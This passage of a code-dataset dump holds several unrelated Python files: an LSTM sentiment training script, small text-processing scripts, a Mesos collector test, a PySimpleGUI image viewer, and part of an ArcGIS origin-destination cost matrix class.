= SKEL(\"../cg.skel\")\n","sub_path":"cpp_practices/asign0529/python/skel.py","file_name":"skel.py","file_ext":"py","file_size_in_byte":1371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"339293190","text":"import random\nimport argparse\n\nimport torch\nimport numpy as np\nimport pandas as pd\nimport torch.optim as optim\nimport matplotlib.pyplot as plt\nfrom torchtext.data import Field\nfrom keras.preprocessing.text import Tokenizer\nfrom sklearn.model_selection import train_test_split\nfrom keras.preprocessing.sequence import pad_sequences\nfrom sklearn.metrics import (accuracy_score, classification_report,\n confusion_matrix)\n\nfrom simple_lstm import LSTM\nfrom simple_lstm import (save_metrics, load_metrics, save_checkpoint,\n load_checkpoint)\n\n\nparser = argparse.ArgumentParser(description='Process some integers.')\nparser.add_argument('--epochs', type=int, default = 5, help='Num Epochs')\nparser.add_argument('--lr', type=float, default = 0.0005, help='Learning rate')\nparser.add_argument('--batch_size', type=int, default = 64, help='Batch size')\nparser.add_argument('--vocab_size', type=int, default = 3000,\n help='Vocab size for lstm')\nparser.add_argument('--output_path', type=str, default = \"models\",\n help='Output path')\nparser.add_argument('--aug_test', type=int, default=1,\n help='Whether or not to cf-augment the test set (0 or 1)')\nargs = parser.parse_args()\n\nEPOCHS = args.epochs\nLR = args.lr\nOUT_DIR = args.output_path\nVOCAB_SIZE = args.vocab_size\nBSZ = args.batch_size\nAUG_TEST = args.aug_test\n\nrandom.seed(123)\nnp.random.seed(123)\ntorch.manual_seed(123)\n\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n\nparams = f'epochs={EPOCHS},lr={LR},vocab={VOCAB_SIZE},bsz={BSZ},aug_test={AUG_TEST}'\nprint(f'params: {params}')\nmodel_name = f'imdb-pretrain'\n\n# load full dataset\npath = 'data/full_imdb_{}.csv'\ntrain_df = pd.read_csv(path.format('train'))\nX_train = train_df['text'].tolist()\ny_train = 
train_df['label'].tolist()\n\nval_df = pd.read_csv(path.format('val'))\nX_val = val_df['text'].tolist()\ny_val = val_df['label'].tolist()\n\n# always use the same augmented test set\nif AUG_TEST:\n test_path = 'data/aug_test.csv'\nelse:\n test_path = 'data/fact_test.csv'\ntest_df = pd.read_csv(test_path)\ny_test = test_df['label'].tolist()\n\nprint('Dataset size:')\nprint(f'{len(y_train)} train, {len(y_val)} val, {len(test_df)} test')\n\n# setup tokenizer\ntokenizer = Tokenizer(num_words=VOCAB_SIZE, oov_token=True)\ntokenizer.fit_on_texts(X_train)\n\n# tokenize, convert to sequences, and pad\n# note: using the same padding for factual/counterfactual data\ndef get_padded_sequences(text):\n sequences = tokenizer.texts_to_sequences(text)\n padding = max([len(i) for i in sequences])\n data = pad_sequences(sequences, maxlen=padding, padding='post')\n return data\n\n\ndef get_cf_padded_sequences(df):\n sequences = tokenizer.texts_to_sequences(df['text'])\n cf_sequences = tokenizer.texts_to_sequences(df['cf-text'])\n padding = max([len(i) for i in sequences] +\n [len(j) for j in cf_sequences])\n data = pad_sequences(sequences, maxlen=padding, padding='post')\n cf_data = pad_sequences(cf_sequences, maxlen=padding, padding='post')\n\n return data, cf_data\n\ntrain_sequences = get_padded_sequences(X_train)\nval_sequences = get_padded_sequences(X_val)\ntest_sequences, cf_test_sequences = get_cf_padded_sequences(test_df)\n\n\ndef get_dataloader(data, labels, batch_size):\n batches = []\n for i in range(0, len(data), batch_size):\n text_tensor = torch.tensor(data[i:i + batch_size], device=device,\n dtype=torch.long)\n length_tensor = torch.tensor([len(j) for j in data[i:i+batch_size]],\n device=device)\n labels_tensor = torch.tensor(labels[i:i + batch_size], device=device,\n dtype=torch.float)\n batches.append((text_tensor, length_tensor, labels_tensor))\n return batches\n\n\ndef get_cf_dataloader(data, cf_data, labels, batch_size):\n batches = []\n for i in range(0, len(data), batch_size):\n text_tensor = torch.tensor(\n data[i:i + batch_size], device=device, dtype=torch.long)\n length_tensor = torch.tensor(\n [len(j) for j in data[i:i+batch_size]], device=device)\n labels_tensor = torch.tensor(\n labels[i:i + batch_size], device=device, dtype=torch.float)\n\n cf_text_tensor = torch.tensor(\n cf_data[i:i + batch_size], device=device, dtype=torch.long)\n cf_length_tensor = torch.tensor(\n [len(j) for j in cf_data[i:i+batch_size]], device=device)\n\n batches.append((text_tensor, length_tensor, cf_text_tensor,\n cf_length_tensor, labels_tensor))\n return batches\n\n\ntrain_loader = get_dataloader(train_sequences, y_train, BSZ)\nval_loader = get_dataloader(val_sequences, y_val, BSZ)\ntest_loader = get_cf_dataloader(test_sequences, cf_test_sequences, y_test, BSZ)\n\n# train and test ------------------------------------------------------------- #\ndestination_folder = OUT_DIR\ncriterion = torch.nn.BCELoss()\n\ndef train(model,\n optimizer,\n criterion = criterion,\n train_loader = train_loader,\n train_batches = len(train_loader),\n valid_loader = val_loader,\n valid_batches = len(val_loader),\n num_epochs = 5,\n eval_every = len(train_loader) // 2,\n file_path = destination_folder,\n best_valid_loss = float(\"Inf\")):\n\n # initialize running values\n running_loss = 0.0\n valid_running_loss = 0.0\n global_step = 0\n train_loss_list = []\n valid_loss_list = []\n global_steps_list = []\n\n # training loop\n model.train()\n for epoch in range(num_epochs):\n for text, text_len, labels in train_loader:\n labels 
= labels.to(device)\n text = text.to(device)\n\n output = model(text, text_len)\n output = torch.sigmoid(output)\n loss = criterion(output, labels)\n\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n # update running values\n running_loss += loss.item()\n global_step += 1\n\n # evaluation step\n if global_step % eval_every == 0:\n model.eval()\n with torch.no_grad():\n # validation loop\n for text, text_len, labels in valid_loader:\n labels = labels.to(device)\n text = text.to(device)\n\n output = model(text, text_len)\n output = torch.sigmoid(output)\n\n loss = criterion(output, labels)\n valid_running_loss += loss.item()\n\n # evaluation\n average_train_loss = running_loss / eval_every\n average_valid_loss = valid_running_loss / valid_batches\n train_loss_list.append(average_train_loss)\n valid_loss_list.append(average_valid_loss)\n global_steps_list.append(global_step)\n\n # resetting running values\n running_loss = 0.0\n valid_running_loss = 0.0\n model.train()\n\n # print progress\n print('Epoch [{}/{}], Step [{}/{}], Train Loss: {:.4f}, Valid Loss: {:.4f}'\n .format(epoch+1, num_epochs, global_step,\n num_epochs*train_batches, average_train_loss,\n average_valid_loss))\n\n # checkpoint\n if best_valid_loss > average_valid_loss:\n best_valid_loss = average_valid_loss\n save_checkpoint(file_path + f'/model-{model_name}.pt',\n model, optimizer, best_valid_loss)\n save_metrics(file_path + f'/metrics-{model_name}.pt',\n train_loss_list, valid_loss_list,\n global_steps_list)\n\n save_metrics(file_path + f'/metrics-{model_name}.pt', train_loss_list,\n valid_loss_list, global_steps_list)\n print('Finished Training!')\n\n# Evaluation Function\ndef evaluate(model, test_loader, version='title', threshold=0.5):\n y_true_fact = []\n\n y_pred_fact = []\n y_pred_cfact = []\n\n y_raw_fact = []\n y_raw_cfact = []\n\n model.eval()\n with torch.no_grad():\n for text, text_len, cf_text, cf_text_len, labels in test_loader:\n # labels\n labels = labels.to(device)\n y_true_fact.extend(labels.tolist())\n\n # factual predictions\n text = text.to(device)\n output = model(text, text_len)\n\n sigmoid_out = torch.sigmoid(output)\n y_raw_fact.extend(sigmoid_out.tolist())\n\n output = (sigmoid_out > threshold).int()\n y_pred_fact.extend(output.tolist())\n\n # cf predictions\n cf_text = cf_text.to(device)\n cf_output = model(cf_text, cf_text_len)\n\n cf_sigmoid_out = torch.sigmoid(cf_output)\n y_raw_cfact.extend(cf_sigmoid_out.tolist())\n\n cf_output = (cf_sigmoid_out > threshold).int()\n y_pred_cfact.extend(cf_output.tolist())\n\n\n print('Classification Report:')\n print(classification_report(y_true_fact, y_pred_fact, labels=[1, 0],\n digits=4))\n\n # CF Consistency:\n # fraction of cf pairs that receive different predictions\n # 1 indicates consistency, 0 indicates lack of consistency\n # note all pairs are asymmetric\n print(f'CF Consistency: {np.not_equal(y_pred_fact, y_pred_cfact).mean()}')\n\n # CF Gap:\n # mean absolute difference in prediction\n # larger is better\n # differences = []\n # for batch_a, batch_b in zip(y_fact_out, y_cfact_out):\n # batch_diff = (batch_a - batch_b).abs().tolist()\n # differences.extend(batch_diff)\n mean_difference = np.abs(np.subtract(y_raw_fact, y_raw_cfact)).mean()\n print(f'CF Gap: {mean_difference}')\n\n # save output\n results_df = pd.DataFrame({\n 'y_true_fact': y_true_fact,\n 'y_pred_fact': y_pred_fact,\n 'y_pred_cfact': y_pred_cfact,\n 'y_raw_fact': y_raw_fact,\n 'y_raw_cfact': y_raw_cfact,\n })\n\n results_df.to_csv(f'results/{model_name}.csv', 
index=False)\n\n\nmodel = LSTM(vocab_size = VOCAB_SIZE).to(device)\noptimizer = optim.Adam(model.parameters(), lr = LR)\n\ntrain(model=model, optimizer=optimizer, num_epochs = EPOCHS)\ntrain_loss_list, valid_loss_list, global_steps_list = load_metrics(\n destination_folder + f'/metrics-{model_name}.pt')\n\nbest_model = LSTM(vocab_size=VOCAB_SIZE).to(device)\noptimizer = optim.Adam(best_model.parameters(), lr=LR)\n\nload_checkpoint(destination_folder + f'/model-{model_name}.pt', best_model,\n optimizer)\nevaluate(best_model, test_loader)\n","sub_path":"imdb/train_full_imdb.py","file_name":"train_full_imdb.py","file_ext":"py","file_size_in_byte":10853,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"9112487","text":"a = input(\"input file name: \")\ninfile = open(\"C:\\\\Users\\\\sts08\\\\Desktop\\\\%s\" %a,\"r\")\ncnt = 0\nfor line in infile:\n line = line.rstrip()\n w_list = line.split()\n for c in w_list:\n cnt+=len(c)\ninfile.close()\n\nprint(\"There are %d letters\" %cnt)\n","sub_path":"프실 1/8주차 실습과제 2.py","file_name":"8주차 실습과제 2.py","file_ext":"py","file_size_in_byte":256,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"239151514","text":"# 先进行子短语频数减去父短语频数的操作\r\nfrom tqdm import tqdm\r\n\r\nfile_path_1 = 'D:\\文件夹汇总\\项目\\军事知识图谱\\爬虫\\环球军事网\\huanqiu_1\\\\n-gram_frequency.txt'\r\nfile_path_2 = 'D:\\文件夹汇总\\项目\\军事知识图谱\\爬虫\\环球军事网\\huanqiu_1\\\\n-gram_frequency_operation.txt'\r\nfh_1 = open(file_path_1,'r',encoding='UTF-8')\r\nfh_2 = open(file_path_2,'a+',encoding='UTF-8')\r\nlines = fh_1.readlines()\r\n\r\nword_2 = {}\r\nword_3 = {}\r\nword_4 = {}\r\nword_5 = {}\r\nword_6 = {}\r\nword_7 = {}\r\n\r\nline_2 = lines[0].strip().split(',')\r\nfre_2 = lines[1].strip().split(',')\r\nline_3 = lines[3].strip().split(',')\r\nfre_3 = lines[4].strip().split(',')\r\nline_4 = lines[6].strip().split(',')\r\nfre_4 = lines[7].strip().split(',')\r\nline_5 = lines[9].strip().split(',')\r\nfre_5 = lines[10].strip().split(',')\r\nline_6 = lines[12].strip().split(',')\r\nfre_6 = lines[13].strip().split(',')\r\nline_7 = lines[15].strip().split(',')\r\nfre_7 = lines[16].strip().split(',')\r\n\r\nprint(fre_2)\r\n\r\nn2 = len(line_2)\r\nfor i in range(n2):\r\n if int(fre_2[i]) > 50:\r\n word_2[line_2[i]] = int(fre_2[i])\r\n\r\nn3 = len(line_3)\r\nfor i in range(n3):\r\n if int(fre_3[i]) > 50:\r\n word_3[line_3[i]] = int(fre_3[i])\r\n\r\nn4 = len(line_4)\r\nfor i in range(n4):\r\n if int(fre_4[i]) > 50:\r\n word_4[line_4[i]] = int(fre_4[i])\r\n\r\nn5 = len(line_5)\r\nfor i in range(n5):\r\n if int(fre_5[i]) > 50:\r\n word_5[line_5[i]] = int(fre_5[i])\r\n\r\nn6 = len(line_6)\r\nfor i in range(n6):\r\n if int(fre_6[i]) > 50:\r\n word_6[line_6[i]] = int(fre_6[i])\r\n\r\nn7 = len(line_7)\r\nfor i in range(n7):\r\n if int(fre_7[i]) > 50:\r\n word_7[line_7[i]] = int(fre_7[i])\r\n\r\n\r\n# 对字长为2的序列操作\r\nfor k2, v2 in tqdm(word_2.items()):\r\n for k3,v3 in word_3.items():\r\n if k2 in k3 :\r\n word_2[k2] = v2-v3\r\n\r\n for k4,v4 in word_4.items():\r\n if k2 in k4 :\r\n word_2[k2] = v2-v4\r\n\r\n for k5,v5 in word_5.items():\r\n if k2 in k5 :\r\n word_2[k2] = v2-v5\r\n\r\n for k6,v6 in word_6.items():\r\n if k2 in k6 :\r\n word_2[k2] = v2-v6\r\n\r\n for k7,v7 in word_7.items():\r\n if k2 in k7 :\r\n word_2[k2] = v2-v7\r\n\r\n# 对字长为3的序列操作\r\nfor k3, v3 in tqdm(word_3.items()):\r\n\r\n for k4,v4 in word_4.items():\r\n if k3 in k4 :\r\n word_3[k3] = v3-v4\r\n\r\n for k5,v5 in word_5.items():\r\n if k3 in k5 :\r\n 
word_3[k3] = v3-v5\r\n\r\n for k6,v6 in word_6.items():\r\n if k3 in k6 :\r\n word_3[k3] = v3-v6\r\n\r\n for k7,v7 in word_7.items():\r\n if k3 in k7 :\r\n word_3[k3] = v3-v7\r\n\r\n\r\n\r\n# 对字长为4的序列操作\r\nfor k4, v4 in tqdm(word_4.items()):\r\n\r\n for k5,v5 in word_5.items():\r\n if k4 in k5 :\r\n word_4[k4] = v4-v5\r\n\r\n for k6,v6 in word_6.items():\r\n if k4 in k6 :\r\n word_4[k4] = v4-v6\r\n\r\n for k7,v7 in word_7.items():\r\n if k4 in k7 :\r\n word_4[k4] = v4-v7\r\n\r\n\r\n# 对字长为5的序列操作\r\nfor k5, v5 in tqdm(word_5.items()):\r\n\r\n for k6,v6 in word_6.items():\r\n if k5 in k6 :\r\n word_5[k5] = v5-v6\r\n\r\n for k7,v7 in word_7.items():\r\n if k5 in k7 :\r\n word_5[k5] = v5-v7\r\n\r\n\r\n# 对字长为6的序列操作\r\nfor k6, v6 in tqdm(word_6.items()):\r\n\r\n for k7,v7 in word_7.items():\r\n if k6 in k7 :\r\n word_6[k6] = v6-v7\r\n\r\n\r\n\r\n\r\n\r\n\r\nKs = []\r\nVs = []\r\nfor k, v in tqdm(word_2.items()):\r\n if v > 100:\r\n Ks.append(k)\r\n Vs.append(v)\r\n\r\nfh_2.write('\\n')\r\nfh_2.write(str(Ks))\r\nfh_2.write('\\n')\r\nfh_2.write(str(Vs))\r\nfh_2.write('\\n')\r\n\r\n\r\nKs = []\r\nVs = []\r\nfor k, v in tqdm(word_3.items()):\r\n if v > 100:\r\n Ks.append(k)\r\n Vs.append(v)\r\n\r\nfh_2.write('\\n')\r\nfh_2.write(str(Ks))\r\nfh_2.write('\\n')\r\nfh_2.write(str(Vs))\r\nfh_2.write('\\n')\r\n\r\n\r\nKs = []\r\nVs = []\r\nfor k, v in tqdm(word_4.items()):\r\n if v > 100:\r\n Ks.append(k)\r\n Vs.append(v)\r\n\r\nfh_2.write('\\n')\r\nfh_2.write(str(Ks))\r\nfh_2.write('\\n')\r\nfh_2.write(str(Vs))\r\nfh_2.write('\\n')\r\n\r\n\r\nKs = []\r\nVs = []\r\nfor k, v in tqdm(word_5.items()):\r\n if v > 100:\r\n Ks.append(k)\r\n Vs.append(v)\r\n\r\nfh_2.write('\\n')\r\nfh_2.write(str(Ks))\r\nfh_2.write('\\n')\r\nfh_2.write(str(Vs))\r\nfh_2.write('\\n')\r\n\r\n\r\nKs = []\r\nVs = []\r\nfor k, v in tqdm(word_6.items()):\r\n if v > 100:\r\n Ks.append(k)\r\n Vs.append(v)\r\n\r\nfh_2.write('\\n')\r\nfh_2.write(str(Ks))\r\nfh_2.write('\\n')\r\nfh_2.write(str(Vs))\r\nfh_2.write('\\n')\r\n\r\n\r\nKs = []\r\nVs = []\r\nfor k, v in tqdm(word_7.items()):\r\n if v > 100:\r\n Ks.append(k)\r\n Vs.append(v)\r\n\r\nfh_2.write('\\n')\r\nfh_2.write(str(Ks))\r\nfh_2.write('\\n')\r\nfh_2.write(str(Vs))\r\nfh_2.write('\\n')\r\n\r\n","sub_path":"Military_KG/phrase_mining/frequency_operation.py","file_name":"frequency_operation.py","file_ext":"py","file_size_in_byte":4707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"53571115","text":"#!/usr/bin/python\n# coding=utf-8\n\nfrom mock import Mock\nfrom mock import patch\n\nfrom test import CollectorTestCase\nfrom test import get_collector_config\nfrom test import unittest\nfrom diamond.collector import Collector\nfrom mesos import MesosCollector\n\n\nclass TestMesosCollector(CollectorTestCase):\n def setUp(self):\n config = get_collector_config('MesosCollector', {})\n\n self.collector = MesosCollector(config, None)\n\n def test_import(self):\n self.assertTrue(MesosCollector)\n\n def test_import(self):\n self.assertTrue(self.collector.config['path'], 'mesos')\n\n @patch.object(Collector, 'publish')\n def test_should_work_for_master_with_real_data(self, publish_mock):\n returns = self.getFixture('master_metrics_snapshot.json')\n urlopen_mock = patch('urllib2.urlopen', Mock(\n side_effect=lambda *args: returns))\n\n urlopen_mock.start()\n self.collector.collect()\n urlopen_mock.stop()\n\n # check how many fixtures were consumed\n self.assertEqual(urlopen_mock.new.call_count, 1)\n\n metrics = {\n 'master/elected': (1, 
0),\n \"system/mem_free_bytes\": (5663678464.1, 0),\n \"registrar/state_store_ms/p9999\": (17.8412544, 6)\n }\n\n self.setDocExample(collector=self.collector.__class__.__name__,\n metrics=metrics,\n defaultpath=self.collector.config['path'])\n self.assertPublishedMany(publish_mock, metrics)\n\n @patch.object(Collector, 'publish')\n def test_should_work_for_slave_with_real_data(self, publish_mock):\n config = get_collector_config('MesosCollector', {'master': False})\n self.collector = MesosCollector(config, None)\n self.assertEqual(self.collector.master, False)\n\n returns = [\n self.getFixture('master_metrics_snapshot.json'),\n self.getFixture('slave_metrics_state.json'),\n self.getFixture('slave_monitor_statistics.json')\n ]\n\n urlopen_mock = patch('urllib2.urlopen', Mock(\n side_effect=lambda *args: returns.pop(0)))\n\n urlopen_mock.start()\n self.collector.collect()\n urlopen_mock.stop()\n\n # check how many fixtures were consumed\n self.assertEqual(urlopen_mock.new.call_count, 3)\n\n metrics = {\n 'master/elected': 1,\n 'system/mem_free_bytes': 5663678464.1,\n 'registrar/state_store_ms/p9999': (17.8412544, 6),\n 'staged_tasks': 20,\n 'started_tasks': 0,\n 'failed_tasks': 6,\n 'finished_tasks': 1,\n 'frameworks.marathon-0_7_6.executors' +\n '.task_name.cpus_limit': (1.7, 1),\n 'frameworks.marathon-0_7_6.executors.'\n 'task_name.instances_count': (2, 0),\n 'frameworks.marathon-0_7_6.executors.'\n 'com_domain_group_anotherApp.mem_mapped_file_bytes': 45056\n }\n\n self.setDocExample(collector=self.collector.__class__.__name__,\n metrics=metrics,\n defaultpath=self.collector.config['path'])\n self.assertPublishedMany(publish_mock, metrics)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"src/collectors/mesos/test/testmesos.py","file_name":"testmesos.py","file_ext":"py","file_size_in_byte":3235,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"341725693","text":"#img_viewer.py\r\n\r\nimport PySimpleGUI as sg\r\nimport os.path\r\n\r\n# ------------------------------ Layout elements ----------------------------- #\r\n\r\nfile_list_column = [\r\n [\r\n sg.Text(\"Image folder\"),\r\n sg.In( size = (25,1), enable_events = True, key = \"-FOLDER-\"),\r\n sg.FolderBrowse(),\r\n ],\r\n [\r\n sg.Listbox(\r\n values = [], enable_events=True, size = (40,20), key=\"-FILE LIST-\")\r\n ],\r\n ]\r\n\r\nimage_viewer_column = [\r\n [sg.Text(\"Choose an image from the list on the left : \")],\r\n [sg.Text(size=(40,1), key=\"-TOUT-\")],\r\n [sg.Image(key=\"-IMAGE-\")],\r\n ]\r\n\r\n# -------------------------------- Full layout ------------------------------- #\r\n\r\nlayout = [\r\n [\r\n sg.Column(file_list_column),\r\n sg.VSeparator(),\r\n sg.Column(image_viewer_column)\r\n ]\r\n ]\r\n\r\nwindow = sg.Window(\"Image viewer\", layout)\r\n\r\nwhile True :\r\n event, values = window.read() #Listen to any events in the window\r\n \r\n #Exit conditions\r\n if event == \"Exit\" or event == sg.WIN_CLOSED:\r\n break\r\n\r\n if event == \"-FOLDER-\":\r\n folder = values[\"-FOLDER-\"]\r\n try:\r\n #Getlist of files in folder\r\n file_list = os.listdir(folder)\r\n except:\r\n file_list = []\r\n fnames = [f for f in file_list if os.path.isfile(os.path.join(folder,f)) and\r\n f.lower().endswith((\".png\",\".gif\"))]\r\n window[\"-FILE LIST-\"].update(fnames)\r\n elif event == \"-FILE LIST-\":\r\n try :\r\n filename = os.path.join( values[\"-FOLDER-\"], values[\"-FILE LIST-\"][0])\r\n window[\"-TOUT-\"].update(filename)\r\n 
window[\"-IMAGE-\"].update(filename = filename)\r\n except :\r\n pass\r\nwindow.close()","sub_path":"Radar/Recherches/img_viewer.py","file_name":"img_viewer.py","file_ext":"py","file_size_in_byte":1809,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"91347122","text":"\"\"\"Compute Origin Destination (OD) cost matrix and save the output matrix as a feature class.\"\"\"\r\n\r\nfrom concurrent import futures\r\nimport os\r\nimport uuid\r\nimport logging\r\nimport shutil\r\nimport itertools\r\nimport time\r\nimport argparse\r\nfrom collections import namedtuple\r\n\r\nimport arcpy\r\n\r\n# Module level logger\r\nlogger = logging.getLogger(__name__) # pylint:disable=invalid-name\r\nlogger.addHandler(logging.NullHandler())\r\n\r\n\r\nclass ODCostMatrix: # pylint:disable = too-many-instance-attributes\r\n \"\"\"Solve a OD Cost Matrix problem.\"\"\"\r\n\r\n # Constants\r\n ORIGINS_OID_FIELD_NAME = \"OriginOID\"\r\n DESTINATIONS_OID_FIELD_NAME = \"DestinationOID\"\r\n MINUTES_TO_MILES = 1.6667 # Travel speed of 100 miles per hour.\r\n SEARCH_TOL = \"5 Miles\" # Distance to search for locations of the inputs on the street network. (~5km)\r\n OD_LINE_SHAPE = \"NO_LINES\" # shape type for the od lines\r\n\r\n def __init__(self, **kwargs):\r\n \"\"\"Set up names used in other methods.\"\"\"\r\n # Store keyword args as instance attributes\r\n self.origins = kwargs[\"origins\"]\r\n self.destinations = kwargs[\"destinations\"]\r\n self.network_data_source = kwargs[\"network_data_source\"]\r\n self.travel_mode = kwargs[\"travel_mode\"]\r\n self.output_folder = kwargs[\"output_folder\"]\r\n self.destination_count = kwargs.get(\"destination_count\", None)\r\n self.cutoff = kwargs.get(\"cutoff\", None)\r\n self.target_count = kwargs.get(\"target_count\", None)\r\n\r\n # Setup the class logger\r\n cls_logger = logging.getLogger(__name__)\r\n self.setup_logger(cls_logger)\r\n self.logger = cls_logger\r\n\r\n # other instance attributes\r\n self.portal_desc = kwargs.get(\"portal_description\", {})\r\n self.job_id = uuid.uuid4().hex\r\n self.job_folder = os.path.join(self.output_folder, self.job_id)\r\n self.pid = os.getpid()\r\n os.mkdir(self.job_folder)\r\n self.origins_sublayer = None\r\n self.destinations_sublayer = None\r\n self.lines_sublayer = None\r\n self.is_service = self.is_nds_service(self.network_data_source)\r\n self.time_attribute = \"\"\r\n self.distance_attribute = \"\"\r\n self.is_travel_mode_time_based = True\r\n self.input_origins_layer = \"InputOrigins\" + self.job_id\r\n self.input_destinations_layer = \"InputDestinations\" + self.job_id\r\n self.job_result = { # Store information about each OD cost matrix result\r\n \"jobId\": self.job_id,\r\n \"jobFolder\": self.job_folder,\r\n \"solveSucceeded\": False,\r\n \"solveMessages\": \"\",\r\n \"outputLines\": \"\",\r\n \"outputLayerFile\": \"\"\r\n }\r\n # Create a unique workspace that will contains inputs and outputs for OD cost matrix computation\r\n result = arcpy.management.CreateFileGDB(self.job_folder, \"scratch\")\r\n self.od_workspace = result.getOutput(0)\r\n\r\n # Create a network dataset layer\r\n self.nds_layer_name = \"NetworkDatasetLayer\"\r\n self._make_nds_layer()\r\n\r\n # Get the ObjectID fields for origins and destinations\r\n # Creates a describe object for a feature class\r\n desc_origins = arcpy.Describe(self.origins)\r\n desc_destinations = arcpy.Describe(self.destinations)\r\n # Setup the names of the OID fields and Name fields for the origins & Destinations\r\n 
self.origins_oid_field_name = desc_origins.oidFieldName\r\n # Field Name is specific to US ZIP Plus 4 dataset. Update for other Origins\r\n self.origins_name_field_name = \"ZIPPLUS4\"\r\n self.destinations_oid_field_name = desc_destinations.oidFieldName\r\n # Field name is specific to the Safegraph POI data set. Update for other Destinations\r\n self.destinations_name_field_name = \"safegraph_\"\r\n\r\n # Get the impedance, time impedance and distance impedance from the travel mode\r\n self._get_travel_mode_info()\r\n\r\n def solve_legacy(self, origins_criteria, # pylint:disable = too-many-locals, too-many-statements\r\n destinations_criteria):\r\n \"\"\"Generate a origin destination cost matrix using a network data source.\r\n\r\n Args:\r\n network_data_source: The network dataset layer or the portal URL for the network dataset source used to\r\n compute the origin destination cost matrix\r\n origins_criteria: A two value tuple representing the range of object ids for the origins to process.\r\n For example, to process origins with object id between 101 and 200, pass (101, 200)\r\n destinations_criteria: A two value tuple representing the range of object ids for the destinations to\r\n process. For example, to process destinations with object id between 101 and 200,\r\n pass (101, 200)\r\n\r\n \"\"\"\r\n # Set the workspace that will contains input and output NA classes used by OD Cost Matrix solver\r\n arcpy.env.workspace = self.od_workspace\r\n\r\n # Determine if we need to use the network dataset layer pointing to a local network dataset or a portal url as\r\n # our network data source. For a local network dataset, we also need to checkout the network analyst extension\r\n # license.\r\n if self.is_service:\r\n network_data_source = self.network_data_source\r\n else:\r\n network_data_source = self.nds_layer_name\r\n arcpy.CheckOutExtension(\"network\")\r\n\r\n # Create a new OD cost matrix layer\r\n self.logger.debug(\"Creating OD Cost Matrix layer\")\r\n result = arcpy.na.MakeODCostMatrixAnalysisLayer(network_data_source, travel_mode=self.travel_mode,\r\n cutoff=self.cutoff, line_shape=self.OD_LINE_SHAPE,\r\n number_of_destinations_to_find=self.target_count,\r\n accumulate_attributes=[self.time_attribute,\r\n self.distance_attribute])\r\n od_layer = result.getOutput(0)\r\n\r\n # Get the names of all the sublayers within the OD cost matrix layer.\r\n sublayer_names = arcpy.na.GetNAClassNames(od_layer)\r\n # Stores the layer names that we will use later\r\n origins_layer_name = sublayer_names[\"Origins\"]\r\n destinations_layer_name = sublayer_names[\"Destinations\"]\r\n\r\n # Select the origins and destinations to process\r\n self._select_inputs(origins_criteria, destinations_criteria)\r\n\r\n # Map the ObjectID field from input origin to the Name field on the origins sub layer and the ObjectID field\r\n # from input destinations to the Name field on the destinations sub layer. 
Map the network locations fields\r\n # using field mappings.\r\n origins_field_mappings = arcpy.na.NAClassFieldMappings(od_layer, origins_layer_name, True,\r\n arcpy.ListFields(self.input_origins_layer))\r\n # origins_field_mappings[\"Name\"].mappedFieldName = self.origins_oid_field_name\r\n origins_field_mappings[\"Name\"].mappedFieldName = self.origins_name_field_name\r\n destinations_field_mappings = arcpy.na.NAClassFieldMappings(od_layer, destinations_layer_name, True,\r\n arcpy.ListFields(self.input_destinations_layer))\r\n # destinations_field_mappings[\"Name\"].mappedFieldName = self.destinations_oid_field_name\r\n destinations_field_mappings[\"Name\"].mappedFieldName = self.destinations_name_field_name\r\n\r\n # Load the origins and destinations using the field mappings and a search tolerance of 20000 Meters.\r\n self.logger.debug(\"Loading origins and destinations\")\r\n arcpy.na.AddLocations(od_layer, origins_layer_name, self.input_origins_layer, origins_field_mappings,\r\n self.SEARCH_TOL, append=\"CLEAR\")\r\n arcpy.na.AddLocations(od_layer, destinations_layer_name, self.input_destinations_layer,\r\n destinations_field_mappings, self.SEARCH_TOL, append=\"CLEAR\")\r\n\r\n # Solve the OD cost matrix layer\r\n self.logger.debug(\"Solving OD cost matrix\")\r\n try:\r\n solve_result = arcpy.na.Solve(od_layer)\r\n except arcpy.ExecuteError:\r\n self.job_result[\"solveMessages\"] = arcpy.GetMessages()\r\n return\r\n self.job_result[\"solveSucceeded\"] = True\r\n self.job_result[\"solveMessages\"] = solve_result.getMessages()\r\n self.logger.debug(\"Solving OD cost matrix %s\", self.job_result[\"solveMessages\"].split(\"\\n\")[-1])\r\n lyr_file = os.path.join(self.job_folder, \"result_{}.lyrx\".format(self.job_id))\r\n self.job_result[\"outputLayerFile\"] = lyr_file\r\n arcpy.management.SaveToLayerFile(od_layer, lyr_file)\r\n\r\n # Get sublayers\r\n # listLayers returns a list of sublayer layer objects contained in the NA group layer, filtered by layer name\r\n # used as a wildcard. Use the sublayer name from GetNAClassNames as the wildcard string in case the sublayers\r\n # have non-default names.\r\n self.origins_sublayer = od_layer.listLayers(origins_layer_name)[0]\r\n self.destinations_sublayer = od_layer.listLayers(destinations_layer_name)[0]\r\n self.lines_sublayer = od_layer.listLayers(sublayer_names[\"ODLines\"])[0]\r\n\r\n # Transfer OIDs\r\n perf_start = time.perf_counter()\r\n self.logger.debug(\"Transferring OIDs from origins and destinations to OD lines\")\r\n self._transfer_oids()\r\n perf_end = time.perf_counter()\r\n self.logger.debug(\"Transferred OIDs in %.2f minutes\", (perf_end - perf_start) / 60)\r\n\r\n # Export the ODlines as output feature class\r\n self.job_result[\"outputLines\"] = self._export_od_lines()\r\n\r\n def solve(self, origins_criteria, # pylint:disable = too-many-locals, too-many-statements\r\n destinations_criteria):\r\n \"\"\"Generate a origin destination cost matrix using a network data source.\r\n\r\n Args:\r\n network_data_source: The network dataset layer or the portal URL for the network dataset source used to\r\n compute the origin destination cost matrix\r\n origins_criteria: A two value tuple representing the range of object ids for the origins to process.\r\n For example, to process origins with object id between 101 and 200, pass (101, 200)\r\n destinations_criteria: A two value tuple representing the range of object ids for the destinations to\r\n process. 
